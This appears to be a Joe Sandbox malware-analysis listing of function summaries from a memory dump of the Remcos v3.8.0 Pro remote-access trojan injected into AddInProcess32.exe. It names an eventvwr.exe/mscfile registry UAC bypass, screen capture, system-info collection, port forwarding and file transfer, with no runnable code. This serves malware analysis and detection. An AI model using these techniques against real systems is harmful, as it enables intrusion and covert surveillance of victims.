                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID: pF$tF
                                                                                                    • API String ID: 269201875-2954683558
                                                                                                    • Opcode ID: 4725d1ccaa69d50f0f75116b1354e5f9a0f2c300be6a0ea456f95d35e2b362d2
                                                                                                    • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                                                                                    • Opcode Fuzzy Hash: 4725d1ccaa69d50f0f75116b1354e5f9a0f2c300be6a0ea456f95d35e2b362d2
                                                                                                    • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                                                                                    APIs
                                                                                                    • SetEvent.KERNEL32(?,?), ref: 0040549F
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                                                                                    • TranslateMessage.USER32(?), ref: 0040555E
                                                                                                    • DispatchMessageA.USER32(?), ref: 00405569
                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                    • API String ID: 2956720200-749203953
                                                                                                    • Opcode ID: eb881b910dc8f90dddaf4e8bc84f9c5ff221e41cd07db74d4947057dfcb05d87
                                                                                                    • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                                                                                    • Opcode Fuzzy Hash: eb881b910dc8f90dddaf4e8bc84f9c5ff221e41cd07db74d4947057dfcb05d87
                                                                                                    • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416123
                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                                                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                    • String ID: <$@$@%G$@%G$Temp
                                                                                                    • API String ID: 1704390241-4139030828
                                                                                                    • Opcode ID: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                                                                                    • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                                                                                    • Opcode Fuzzy Hash: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                                                                                    • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                                                                                    APIs
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                                                                                    • ExitProcess.KERNEL32 ref: 00406782
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteExitProcessShell
                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                                    • API String ID: 1124553745-4172179172
                                                                                                    • Opcode ID: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
                                                                                                    • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                                                                                    • Opcode Fuzzy Hash: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
                                                                                                    • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                    • String ID:
                                                                                                    • API String ID: 221034970-0
                                                                                                    • Opcode ID: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
                                                                                                    • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                                                                                    • Opcode Fuzzy Hash: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
                                                                                                    • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00445645
                                                                                                      • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                                      • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                                    • _free.LIBCMT ref: 00445651
                                                                                                    • _free.LIBCMT ref: 0044565C
                                                                                                    • _free.LIBCMT ref: 00445667
                                                                                                    • _free.LIBCMT ref: 00445672
                                                                                                    • _free.LIBCMT ref: 0044567D
                                                                                                    • _free.LIBCMT ref: 00445688
                                                                                                    • _free.LIBCMT ref: 00445693
                                                                                                    • _free.LIBCMT ref: 0044569E
                                                                                                    • _free.LIBCMT ref: 004456AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                                    • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                                                                                    • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                                    • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00417F6F
                                                                                                    • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004180B3
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 004180BB
                                                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                    • API String ID: 489098229-3790400642
                                                                                                    • Opcode ID: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
                                                                                                    • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                                                                                    • Opcode Fuzzy Hash: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
                                                                                                    • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                                                                                    APIs
                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DecodePointer
                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                    • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                                    • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                                                                                    • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                                    • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                                                                                    APIs
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                                                                      • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00415A46
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                    • API String ID: 1462127192-2001430897
                                                                                                    • Opcode ID: c307326a2d4da14b47a645fa851b17816842e45e22820a58d3251ab05c7b5f9b
                                                                                                    • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                                                                                    • Opcode Fuzzy Hash: c307326a2d4da14b47a645fa851b17816842e45e22820a58d3251ab05c7b5f9b
                                                                                                    • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                                                                                    APIs
                                                                                                    • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocConsoleShowWindow
                                                                                                    • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                                                                    • API String ID: 4118500197-4025029772
                                                                                                    • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                                    • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                                                                                    • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                                    • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                                                                      • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                                      • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                                      • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                                                                                    • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                                                                                    • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                                                                                    • TranslateMessage.USER32(?), ref: 0041B29E
                                                                                                    • DispatchMessageA.USER32(?), ref: 0041B2A8
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                    • String ID: Remcos
                                                                                                    • API String ID: 1970332568-165870891
                                                                                                    • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                                    • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                                                                                    • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                                    • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0373084e170eda584d69660d0852fa829e8bf6c5b800921f0d25bf294904909d
                                                                                                    • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                                                                                    • Opcode Fuzzy Hash: 0373084e170eda584d69660d0852fa829e8bf6c5b800921f0d25bf294904909d
                                                                                                    • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                                                                                    APIs
                                                                                                      • Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                                                                                    • __dosmaperr.LIBCMT ref: 00452ED6
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                                                                                    • __dosmaperr.LIBCMT ref: 00452EF5
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                                                                                    • GetLastError.KERNEL32 ref: 00453091
                                                                                                    • __dosmaperr.LIBCMT ref: 00453098
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4237864984-0
                                                                                                    • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                                    • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                                                                                    • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                                    • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                                                                                    • __alloca_probe_16.LIBCMT ref: 004510CA
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                                                                                    • __alloca_probe_16.LIBCMT ref: 00451174
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                                                                                      • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                                                                                    • __freea.LIBCMT ref: 004511E3
                                                                                                    • __freea.LIBCMT ref: 004511EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 201697637-0
                                                                                                    • Opcode ID: a5a713538fdccf1cca4068f577cca91d4991349a8f63965c2cf1c5bc51f55973
                                                                                                    • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                                                                                    • Opcode Fuzzy Hash: a5a713538fdccf1cca4068f577cca91d4991349a8f63965c2cf1c5bc51f55973
                                                                                                    • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00442935
                                                                                                    • _free.LIBCMT ref: 004429A6
                                                                                                    • _free.LIBCMT ref: 004429BF
                                                                                                    • _free.LIBCMT ref: 004429F1
                                                                                                    • _free.LIBCMT ref: 004429FA
                                                                                                    • _free.LIBCMT ref: 00442A06
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                    • String ID: C
                                                                                                    • API String ID: 1679612858-1037565863
                                                                                                    • Opcode ID: 90a8a8f40c130bc050ddff9b8cd50337f0c7838150b21dd947fe4906e5c3f5e8
                                                                                                    • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                                                                                    • Opcode Fuzzy Hash: 90a8a8f40c130bc050ddff9b8cd50337f0c7838150b21dd947fe4906e5c3f5e8
                                                                                                    • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tcp$udp
                                                                                                    • API String ID: 0-3725065008
                                                                                                    • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                                    • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                                                                                    • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                                    • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Eventinet_ntoa
                                                                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                    • API String ID: 3578746661-168337528
                                                                                                    • Opcode ID: 7aad75cc0eebb2e9d3ac8b012f70ba9c1af19a6d2a5a7bc0ab2fb84483b27ce6
                                                                                                    • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                                                                                    • Opcode Fuzzy Hash: 7aad75cc0eebb2e9d3ac8b012f70ba9c1af19a6d2a5a7bc0ab2fb84483b27ce6
                                                                                                    • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                                                                      • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
                                                                                                      • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                    • String ID: .part
                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                    • Opcode ID: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
                                                                                                    • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                                                                                    • Opcode Fuzzy Hash: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
                                                                                                    • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
                                                                                                    • __alloca_probe_16.LIBCMT ref: 00447056
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044713B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                                                                                    • __freea.LIBCMT ref: 004471AB
                                                                                                      • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    • __freea.LIBCMT ref: 004471B4
                                                                                                    • __freea.LIBCMT ref: 004471D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864826663-0
                                                                                                    • Opcode ID: 2e3600b746fe9ac87d59e0b6531a88c852240b79fdaa103bb46f95523c215d20
